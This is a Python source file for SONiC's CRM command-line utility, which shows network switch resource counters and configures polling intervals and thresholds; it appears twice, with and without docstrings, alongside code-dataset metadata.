self.db.get_all(self.db.COUNTERS_DB, 'CRM:STATS') data = [] if crm_stats: if resource == 'all': for res in ["ipv4_route", "ipv6_route", "ipv4_nexthop", "ipv6_nexthop", "ipv4_neighbor", "ipv6_neighbor", "nexthop_group_member", "nexthop_group", "fdb_entry", "ipmc_entry", "snat_entry", "dnat_entry", "mpls_inseg", "mpls_nexthop","srv6_nexthop", "srv6_my_sid_entry"]: if 'crm_stats_' + res + "_used" in crm_stats.keys() and 'crm_stats_' + res + "_available" in crm_stats.keys(): data.append([res, crm_stats['crm_stats_' + res + "_used"], crm_stats['crm_stats_' + res + "_available"]]) else: if 'crm_stats_' + resource + "_used" in crm_stats.keys() and 'crm_stats_' + resource + "_available" in crm_stats.keys(): data.append([resource, crm_stats['crm_stats_' + resource + "_used"], crm_stats['crm_stats_' + resource + "_available"]]) return data def get_acl_resources(self): """ CRM Handler to get ACL recources information. """ data = [] for stage in ["INGRESS", "EGRESS"]: for bind_point in ["PORT", "LAG", "VLAN", "RIF", "SWITCH"]: crm_stats = self.db.get_all(self.db.COUNTERS_DB, 'CRM:ACL_STATS:{0}:{1}'.format(stage, bind_point)) if crm_stats: for res in ["acl_group", "acl_table"]: data.append([ stage, bind_point, res, crm_stats['crm_stats_' + res + "_used"], crm_stats['crm_stats_' + res + "_available"] ]) return data def get_acl_table_resources(self): """ CRM Handler to display ACL table information. """ # Retrieve all ACL table keys from CRM:ACL_TABLE_STATS crm_acl_keys = self.db.keys(self.db.COUNTERS_DB, 'CRM:ACL_TABLE_STATS*') data = [] for key in crm_acl_keys or [None]: if key: id = key.replace('CRM:ACL_TABLE_STATS:', '') crm_stats = self.db.get_all(self.db.COUNTERS_DB, key) for res in ['acl_entry', 'acl_counter']: if ('crm_stats_' + res + '_used' in crm_stats) and ('crm_stats_' + res + '_available' in crm_stats): data.append([id, res, crm_stats['crm_stats_' + res + '_used'], crm_stats['crm_stats_' + res + '_available']]) return data @multi_asic_util.run_on_multi_asic def show_resources(self, resource): """ CRM Handler to display resources information. """ if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") err_msg = '\nCRM counters are not ready for '+ self.multi_asic.current_namespace.upper() + '. They would be populated after the polling interval.' else: header = ("Resource Name", "Used Count", "Available Count") err_msg = '\nCRM counters are not ready. They would be populated after the polling interval.' data = [] data = self.get_resources(resource) if data: click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() else: click.echo(err_msg) @multi_asic_util.run_on_multi_asic def show_acl_resources(self): """ CRM Handler to display ACL recources information. """ if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nStage", "\n\nBind Point", "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") else: header = ("Stage", "Bind Point", "Resource Name", "Used Count", "Available Count") data = [] data = self.get_acl_resources() click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() @multi_asic_util.run_on_multi_asic def show_acl_table_resources(self): """ CRM Handler to display ACL table information. """ if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nTable ID", "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") else: header = ("Table ID", "Resource Name", "Used Count", "Available Count") data = [] data = self.get_acl_table_resources() click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() @click.group() @click.pass_context def cli(ctx): """ Utility entry point. """ # Use the db object if given as input. db = None if ctx.obj is None else ctx.obj.cfgdb # Load database config files load_db_config() context = { "crm": Crm(db) } ctx.obj = context @cli.group() @click.pass_context def config(ctx): """CRM related configuration""" pass @config.group() @click.pass_context def polling(ctx): """CRM polling configuration""" pass @polling.command() @click.pass_context @click.argument('interval', type=click.INT) def interval(ctx, interval): """CRM polling interval configuration""" ctx.obj["crm"].config('polling_interval', interval) @config.group() @click.pass_context def thresholds(ctx): """CRM thresholds configuration""" pass @thresholds.group() @click.pass_context def ipv4(ctx): """CRM resource IPv4 address-family""" ctx.obj["crm"].addr_family = 'ipv4' @thresholds.group() @click.pass_context def ipv6(ctx): """CRM resource IPv6 address-family""" ctx.obj["crm"].addr_family = 'ipv6' @thresholds.group() @click.pass_context def mpls(ctx): """CRM resource MPLS address-family""" ctx.obj["crm"].addr_family = 'mpls' @mpls.group() @click.pass_context def inseg(ctx): """CRM configuration for in-segment resource""" ctx.obj["crm"].res_type = 'inseg' @ipv4.group() @click.pass_context def route(ctx): """CRM configuration for route resource""" ctx.obj["crm"].res_type = 'route' @ipv4.group() @click.pass_context def neighbor(ctx): """CRM configuration for neigbor resource""" ctx.obj["crm"].res_type = 'neighbor' @ipv4.group() @click.pass_context def nexthop(ctx): """CRM configuration for nexthop resource""" ctx.obj["crm"].res_type = 'nexthop' @route.command() @click.argument('value', type=click.Choice(['percentage', 'used', 'free'])) @click.pass_context def type(ctx, value): """CRM threshold type configuration""" attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'threshold_type' ctx.obj["crm"].config(attr, value) @route.command() @click.argument('value', type=click.INT) @click.pass_context def low(ctx, value): """CRM low threshold configuration""" attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'low_threshold' ctx.obj["crm"].config(attr, value) @route.command() @click.argument('value', type=click.INT) @click.pass_context def high(ctx, value): """CRM high threshold configuration""" attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'high_threshold' ctx.obj["crm"].config(attr, value) neighbor.add_command(type) neighbor.add_command(low) neighbor.add_command(high) nexthop.add_command(type) nexthop.add_command(low) nexthop.add_command(high) inseg.add_command(type) inseg.add_command(low) inseg.add_command(high) ipv6.add_command(route) ipv6.add_command(neighbor) ipv6.add_command(nexthop) mpls.add_command(nexthop) @thresholds.group() @click.pass_context def nexthop(ctx): """CRM configuration for nexthop resource""" pass @nexthop.group() @click.pass_context def group(ctx): """CRM configuration for nexthop group resource""" pass @group.group() @click.pass_context def member(ctx): """CRM configuration for nexthop group member resource""" ctx.obj["crm"].res_type = 'nexthop_group_member' @group.group() @click.pass_context def object(ctx): """CRM configuration for nexthop group resource""" ctx.obj["crm"].res_type = 'nexthop_group' member.add_command(type) member.add_command(low) member.add_command(high) object.add_command(type) object.add_command(low) object.add_command(high) @thresholds.group() @click.pass_context def fdb(ctx): """CRM configuration for FDB resource""" ctx.obj["crm"].res_type = 'fdb_entry' fdb.add_command(type) fdb.add_command(low) fdb.add_command(high) @thresholds.group() @click.pass_context def ipmc(ctx): """CRM configuration for IPMC resource""" ctx.obj["crm"].res_type = 'ipmc_entry' ipmc.add_command(type) ipmc.add_command(low) ipmc.add_command(high) @thresholds.group() @click.pass_context def snat(ctx): """CRM configuration for Source NAT resource""" ctx.obj["crm"].res_type = 'snat_entry' snat.add_command(type) snat.add_command(low) snat.add_command(high) @thresholds.group() @click.pass_context def dnat(ctx): """CRM configuration for Destination NAT resource""" ctx.obj["crm"].res_type = 'dnat_entry' dnat.add_command(type) dnat.add_command(low) dnat.add_command(high) @thresholds.group() @click.pass_context def acl(ctx): """CRM configuration for ACL resource""" pass @acl.group() @click.pass_context def table(ctx): """CRM configuration for ACL table resource""" ctx.obj["crm"].res_type = 'acl_table' table.add_command(type) table.add_command(low) table.add_command(high) @acl.group() @click.pass_context def group(ctx): """CRM configuration for ACL group resource""" ctx.obj["crm"].res_type = 'acl_group' group.add_command(type) group.add_command(low) group.add_command(high) @group.group() @click.pass_context def entry(ctx): """CRM configuration for ACL entry resource""" ctx.obj["crm"].res_type = 'acl_entry' entry.add_command(type) entry.add_command(low) entry.add_command(high) @group.group() @click.pass_context def counter(ctx): """CRM configuration for ACL counter resource""" ctx.obj["crm"].res_type = 'acl_counter' counter.add_command(type) counter.add_command(low) counter.add_command(high) @thresholds.group() @click.pass_context def srv6_nexthop(ctx): """CRM configuration for SRV6 Nexthop resource""" ctx.obj["crm"].res_type = 'srv6_nexthop' srv6_nexthop.add_command(type) srv6_nexthop.add_command(low) srv6_nexthop.add_command(high) @thresholds.group() @click.pass_context def srv6_my_sid_entry(ctx): """CRM configuration for SRV6 MY_SID resource""" ctx.obj["crm"].res_type = 'srv6_my_sid_entry' srv6_my_sid_entry.add_command(type) srv6_my_sid_entry.add_command(low) srv6_my_sid_entry.add_command(high) @cli.group() @click.pass_context def show(ctx): """Show CRM related information""" pass @show.command() @click.pass_context def summary(ctx): """Show CRM general information""" ctx.obj["crm"].show_summary() @show.group() @click.pass_context def resources(ctx): """Show CRM resources information""" ctx.obj["crm"].cli_mode = 'resources' @show.group() @click.pass_context def thresholds(ctx): """Show CRM thresholds information""" ctx.obj["crm"].cli_mode = 'thresholds' @resources.command() @click.pass_context def all(ctx): """Show CRM information for all resources""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('all') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('all') ctx.obj["crm"].show_acl_resources() ctx.obj["crm"].show_acl_table_resources() @resources.group() @click.pass_context def ipv4(ctx): """CRM resource IPv4 address family""" ctx.obj["crm"].addr_family = 'ipv4' @resources.group() @click.pass_context def ipv6(ctx): """CRM resource IPv6 address family""" ctx.obj["crm"].addr_family = 'ipv6' @resources.group() @click.pass_context def mpls(ctx): """CRM resource MPLS address family""" ctx.obj["crm"].addr_family = 'mpls' @mpls.command() @click.pass_context def inseg(ctx): """Show CRM information for in-segment resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_inseg'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_inseg'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def route(ctx): """Show CRM information for route resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_route'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_route'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def neighbor(ctx): """Show CRM information for neighbor resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_neighbor'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_neighbor'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def nexthop(ctx): """Show CRM information for nexthop resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_nexthop'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_nexthop'.format(ctx.obj["crm"].addr_family)) ipv6.add_command(route) ipv6.add_command(neighbor) ipv6.add_command(nexthop) mpls.add_command(nexthop) @resources.group() @click.pass_context def nexthop(ctx): """Show CRM information for nexthop resource""" pass @nexthop.group() @click.pass_context def group(ctx): """Show CRM information for nexthop group resource""" pass @group.command() @click.pass_context def member(ctx): """Show CRM information for nexthop group member resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('nexthop_group_member') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('nexthop_group_member') @group.command() @click.pass_context def object(ctx): """Show CRM information for nexthop group resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('nexthop_group') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('nexthop_group') @resources.group() @click.pass_context def acl(ctx): """Show CRM information for acl resource""" pass @acl.command() @click.pass_context def table(ctx): """Show CRM information for acl table resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('acl_table') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_acl_table_resources() @acl.command() @click.pass_context def group(ctx): """Show CRM information for acl group resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('acl_group') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_acl_resources() @resources.command() @click.pass_context def fdb(ctx): """Show CRM information for fdb resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('fdb_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('fdb_entry') @resources.command() @click.pass_context def ipmc(ctx): """Show CRM information for IPMC resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('ipmc_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('ipmc_entry') @resources.command() @click.pass_context def snat(ctx): """Show CRM information for SNAT resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('snat_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('snat_entry') @resources.command() @click.pass_context def dnat(ctx): """Show CRM information for DNAT resource""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('dnat_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('dnat_entry') @resources.command() @click.pass_context def srv6_nexthop(ctx): """Show CRM information for SRV6 Nexthop""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('srv6_nexthop') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('srv6_nexthop') @resources.command() @click.pass_context def srv6_my_sid_entry(ctx): """Show CRM information for SRV6 MY_SID entry""" if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('srv6_my_sid_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('srv6_my_sid_entry') thresholds.add_command(acl) thresholds.add_command(all) thresholds.add_command(fdb) thresholds.add_command(ipv4) thresholds.add_command(ipv6) thresholds.add_command(mpls) thresholds.add_command(nexthop) thresholds.add_command(ipmc) thresholds.add_command(snat) thresholds.add_command(dnat) thresholds.add_command(srv6_nexthop) thresholds.add_command(srv6_my_sid_entry) if __name__ == '__main__': cli()
30.619116
162
0.643729
import click from swsscommon.swsscommon import ConfigDBConnector from tabulate import tabulate from sonic_py_common import multi_asic from utilities_common.general import load_db_config from utilities_common import multi_asic as multi_asic_util class Crm: def __init__(self, db=None): self.cli_mode = None self.addr_family = None self.res_type = None self.db = None self.cfgdb = db self.multi_asic = multi_asic_util.MultiAsic() @multi_asic_util.run_on_multi_asic def config(self, attr, val): if self.cfgdb: self.config_db = self.cfgdb self.config_db.mod_entry("CRM", 'Config', {attr: val}) def show_summary(self): configdb = self.cfgdb if configdb is None: namespaces = multi_asic.get_namespace_list() configdb = ConfigDBConnector(namespace=namespaces[0]) configdb.connect() crm_info = configdb.get_entry('CRM', 'Config') if crm_info: try: click.echo('\nPolling Interval: ' + crm_info['polling_interval'] + ' second(s)\n') except KeyError: click.echo('\nError! Could not get CRM configuration.\n') click.echo('\nError! Please configure polling interval.\n') else: click.echo('\nError! Could not get CRM configuration.\n') def show_thresholds(self, resource): configdb = self.cfgdb if configdb is None: namespaces = multi_asic.get_namespace_list() configdb = ConfigDBConnector(namespace=namespaces[0]) configdb.connect() crm_info = configdb.get_entry('CRM', 'Config') header = ("Resource Name", "Threshold Type", "Low Threshold", "High Threshold") data = [] if crm_info: if resource == 'all': for res in ["ipv4_route", "ipv6_route", "ipv4_nexthop", "ipv6_nexthop", "ipv4_neighbor", "ipv6_neighbor", "nexthop_group_member", "nexthop_group", "acl_table", "acl_group", "acl_entry", "acl_counter", "fdb_entry", "ipmc_entry", "snat_entry", "dnat_entry", "mpls_inseg", "mpls_nexthop","srv6_nexthop", "srv6_my_sid_entry"]: try: data.append([res, crm_info[res + "_threshold_type"], crm_info[res + "_low_threshold"], crm_info[res + "_high_threshold"]]) except KeyError: pass else: try: data.append([resource, crm_info[resource + "_threshold_type"], crm_info[resource + "_low_threshold"], crm_info[resource + "_high_threshold"]]) except KeyError: pass else: click.echo('\nError! Could not get CRM configuration.') click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() def get_resources(self, resource): crm_stats = self.db.get_all(self.db.COUNTERS_DB, 'CRM:STATS') data = [] if crm_stats: if resource == 'all': for res in ["ipv4_route", "ipv6_route", "ipv4_nexthop", "ipv6_nexthop", "ipv4_neighbor", "ipv6_neighbor", "nexthop_group_member", "nexthop_group", "fdb_entry", "ipmc_entry", "snat_entry", "dnat_entry", "mpls_inseg", "mpls_nexthop","srv6_nexthop", "srv6_my_sid_entry"]: if 'crm_stats_' + res + "_used" in crm_stats.keys() and 'crm_stats_' + res + "_available" in crm_stats.keys(): data.append([res, crm_stats['crm_stats_' + res + "_used"], crm_stats['crm_stats_' + res + "_available"]]) else: if 'crm_stats_' + resource + "_used" in crm_stats.keys() and 'crm_stats_' + resource + "_available" in crm_stats.keys(): data.append([resource, crm_stats['crm_stats_' + resource + "_used"], crm_stats['crm_stats_' + resource + "_available"]]) return data def get_acl_resources(self): data = [] for stage in ["INGRESS", "EGRESS"]: for bind_point in ["PORT", "LAG", "VLAN", "RIF", "SWITCH"]: crm_stats = self.db.get_all(self.db.COUNTERS_DB, 'CRM:ACL_STATS:{0}:{1}'.format(stage, bind_point)) if crm_stats: for res in ["acl_group", "acl_table"]: data.append([ stage, bind_point, res, crm_stats['crm_stats_' + res + "_used"], crm_stats['crm_stats_' + res + "_available"] ]) return data def get_acl_table_resources(self): crm_acl_keys = self.db.keys(self.db.COUNTERS_DB, 'CRM:ACL_TABLE_STATS*') data = [] for key in crm_acl_keys or [None]: if key: id = key.replace('CRM:ACL_TABLE_STATS:', '') crm_stats = self.db.get_all(self.db.COUNTERS_DB, key) for res in ['acl_entry', 'acl_counter']: if ('crm_stats_' + res + '_used' in crm_stats) and ('crm_stats_' + res + '_available' in crm_stats): data.append([id, res, crm_stats['crm_stats_' + res + '_used'], crm_stats['crm_stats_' + res + '_available']]) return data @multi_asic_util.run_on_multi_asic def show_resources(self, resource): if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") err_msg = '\nCRM counters are not ready for '+ self.multi_asic.current_namespace.upper() + '. They would be populated after the polling interval.' else: header = ("Resource Name", "Used Count", "Available Count") err_msg = '\nCRM counters are not ready. They would be populated after the polling interval.' data = [] data = self.get_resources(resource) if data: click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() else: click.echo(err_msg) @multi_asic_util.run_on_multi_asic def show_acl_resources(self): if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nStage", "\n\nBind Point", "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") else: header = ("Stage", "Bind Point", "Resource Name", "Used Count", "Available Count") data = [] data = self.get_acl_resources() click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() @multi_asic_util.run_on_multi_asic def show_acl_table_resources(self): if multi_asic.is_multi_asic(): header = (self.multi_asic.current_namespace.upper() + "\n\nTable ID", "\n\nResource Name", "\n\nUsed Count", "\n\nAvailable Count") else: header = ("Table ID", "Resource Name", "Used Count", "Available Count") data = [] data = self.get_acl_table_resources() click.echo() click.echo(tabulate(data, headers=header, tablefmt="simple", missingval="")) click.echo() @click.group() @click.pass_context def cli(ctx): db = None if ctx.obj is None else ctx.obj.cfgdb load_db_config() context = { "crm": Crm(db) } ctx.obj = context @cli.group() @click.pass_context def config(ctx): pass @config.group() @click.pass_context def polling(ctx): pass @polling.command() @click.pass_context @click.argument('interval', type=click.INT) def interval(ctx, interval): ctx.obj["crm"].config('polling_interval', interval) @config.group() @click.pass_context def thresholds(ctx): pass @thresholds.group() @click.pass_context def ipv4(ctx): ctx.obj["crm"].addr_family = 'ipv4' @thresholds.group() @click.pass_context def ipv6(ctx): ctx.obj["crm"].addr_family = 'ipv6' @thresholds.group() @click.pass_context def mpls(ctx): ctx.obj["crm"].addr_family = 'mpls' @mpls.group() @click.pass_context def inseg(ctx): ctx.obj["crm"].res_type = 'inseg' @ipv4.group() @click.pass_context def route(ctx): ctx.obj["crm"].res_type = 'route' @ipv4.group() @click.pass_context def neighbor(ctx): ctx.obj["crm"].res_type = 'neighbor' @ipv4.group() @click.pass_context def nexthop(ctx): ctx.obj["crm"].res_type = 'nexthop' @route.command() @click.argument('value', type=click.Choice(['percentage', 'used', 'free'])) @click.pass_context def type(ctx, value): attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'threshold_type' ctx.obj["crm"].config(attr, value) @route.command() @click.argument('value', type=click.INT) @click.pass_context def low(ctx, value): attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'low_threshold' ctx.obj["crm"].config(attr, value) @route.command() @click.argument('value', type=click.INT) @click.pass_context def high(ctx, value): attr = '' if ctx.obj["crm"].addr_family != None: attr += ctx.obj["crm"].addr_family + '_' attr += ctx.obj["crm"].res_type + '_' + 'high_threshold' ctx.obj["crm"].config(attr, value) neighbor.add_command(type) neighbor.add_command(low) neighbor.add_command(high) nexthop.add_command(type) nexthop.add_command(low) nexthop.add_command(high) inseg.add_command(type) inseg.add_command(low) inseg.add_command(high) ipv6.add_command(route) ipv6.add_command(neighbor) ipv6.add_command(nexthop) mpls.add_command(nexthop) @thresholds.group() @click.pass_context def nexthop(ctx): pass @nexthop.group() @click.pass_context def group(ctx): pass @group.group() @click.pass_context def member(ctx): ctx.obj["crm"].res_type = 'nexthop_group_member' @group.group() @click.pass_context def object(ctx): ctx.obj["crm"].res_type = 'nexthop_group' member.add_command(type) member.add_command(low) member.add_command(high) object.add_command(type) object.add_command(low) object.add_command(high) @thresholds.group() @click.pass_context def fdb(ctx): ctx.obj["crm"].res_type = 'fdb_entry' fdb.add_command(type) fdb.add_command(low) fdb.add_command(high) @thresholds.group() @click.pass_context def ipmc(ctx): ctx.obj["crm"].res_type = 'ipmc_entry' ipmc.add_command(type) ipmc.add_command(low) ipmc.add_command(high) @thresholds.group() @click.pass_context def snat(ctx): ctx.obj["crm"].res_type = 'snat_entry' snat.add_command(type) snat.add_command(low) snat.add_command(high) @thresholds.group() @click.pass_context def dnat(ctx): ctx.obj["crm"].res_type = 'dnat_entry' dnat.add_command(type) dnat.add_command(low) dnat.add_command(high) @thresholds.group() @click.pass_context def acl(ctx): pass @acl.group() @click.pass_context def table(ctx): ctx.obj["crm"].res_type = 'acl_table' table.add_command(type) table.add_command(low) table.add_command(high) @acl.group() @click.pass_context def group(ctx): ctx.obj["crm"].res_type = 'acl_group' group.add_command(type) group.add_command(low) group.add_command(high) @group.group() @click.pass_context def entry(ctx): ctx.obj["crm"].res_type = 'acl_entry' entry.add_command(type) entry.add_command(low) entry.add_command(high) @group.group() @click.pass_context def counter(ctx): ctx.obj["crm"].res_type = 'acl_counter' counter.add_command(type) counter.add_command(low) counter.add_command(high) @thresholds.group() @click.pass_context def srv6_nexthop(ctx): ctx.obj["crm"].res_type = 'srv6_nexthop' srv6_nexthop.add_command(type) srv6_nexthop.add_command(low) srv6_nexthop.add_command(high) @thresholds.group() @click.pass_context def srv6_my_sid_entry(ctx): ctx.obj["crm"].res_type = 'srv6_my_sid_entry' srv6_my_sid_entry.add_command(type) srv6_my_sid_entry.add_command(low) srv6_my_sid_entry.add_command(high) @cli.group() @click.pass_context def show(ctx): pass @show.command() @click.pass_context def summary(ctx): ctx.obj["crm"].show_summary() @show.group() @click.pass_context def resources(ctx): ctx.obj["crm"].cli_mode = 'resources' @show.group() @click.pass_context def thresholds(ctx): ctx.obj["crm"].cli_mode = 'thresholds' @resources.command() @click.pass_context def all(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('all') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('all') ctx.obj["crm"].show_acl_resources() ctx.obj["crm"].show_acl_table_resources() @resources.group() @click.pass_context def ipv4(ctx): ctx.obj["crm"].addr_family = 'ipv4' @resources.group() @click.pass_context def ipv6(ctx): ctx.obj["crm"].addr_family = 'ipv6' @resources.group() @click.pass_context def mpls(ctx): ctx.obj["crm"].addr_family = 'mpls' @mpls.command() @click.pass_context def inseg(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_inseg'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_inseg'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def route(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_route'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_route'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def neighbor(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_neighbor'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_neighbor'.format(ctx.obj["crm"].addr_family)) @ipv4.command() @click.pass_context def nexthop(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('{0}_nexthop'.format(ctx.obj["crm"].addr_family)) elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('{0}_nexthop'.format(ctx.obj["crm"].addr_family)) ipv6.add_command(route) ipv6.add_command(neighbor) ipv6.add_command(nexthop) mpls.add_command(nexthop) @resources.group() @click.pass_context def nexthop(ctx): pass @nexthop.group() @click.pass_context def group(ctx): pass @group.command() @click.pass_context def member(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('nexthop_group_member') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('nexthop_group_member') @group.command() @click.pass_context def object(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('nexthop_group') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('nexthop_group') @resources.group() @click.pass_context def acl(ctx): pass @acl.command() @click.pass_context def table(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('acl_table') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_acl_table_resources() @acl.command() @click.pass_context def group(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('acl_group') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_acl_resources() @resources.command() @click.pass_context def fdb(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('fdb_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('fdb_entry') @resources.command() @click.pass_context def ipmc(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('ipmc_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('ipmc_entry') @resources.command() @click.pass_context def snat(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('snat_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('snat_entry') @resources.command() @click.pass_context def dnat(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('dnat_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('dnat_entry') @resources.command() @click.pass_context def srv6_nexthop(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('srv6_nexthop') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('srv6_nexthop') @resources.command() @click.pass_context def srv6_my_sid_entry(ctx): if ctx.obj["crm"].cli_mode == 'thresholds': ctx.obj["crm"].show_thresholds('srv6_my_sid_entry') elif ctx.obj["crm"].cli_mode == 'resources': ctx.obj["crm"].show_resources('srv6_my_sid_entry') thresholds.add_command(acl) thresholds.add_command(all) thresholds.add_command(fdb) thresholds.add_command(ipv4) thresholds.add_command(ipv6) thresholds.add_command(mpls) thresholds.add_command(nexthop) thresholds.add_command(ipmc) thresholds.add_command(snat) thresholds.add_command(dnat) thresholds.add_command(srv6_nexthop) thresholds.add_command(srv6_my_sid_entry) if __name__ == '__main__': cli()
true
true
f728f8b82ee1b35cb06195653de9369b9601a04e
20,402
py
Python
brian2/tests/test_codegen.py
Ziaeemehr/brian2
0d28f61881a033f877fb333b5e93c56e5c479b4b
[ "BSD-2-Clause" ]
null
null
null
brian2/tests/test_codegen.py
Ziaeemehr/brian2
0d28f61881a033f877fb333b5e93c56e5c479b4b
[ "BSD-2-Clause" ]
null
null
null
brian2/tests/test_codegen.py
Ziaeemehr/brian2
0d28f61881a033f877fb333b5e93c56e5c479b4b
[ "BSD-2-Clause" ]
null
null
null
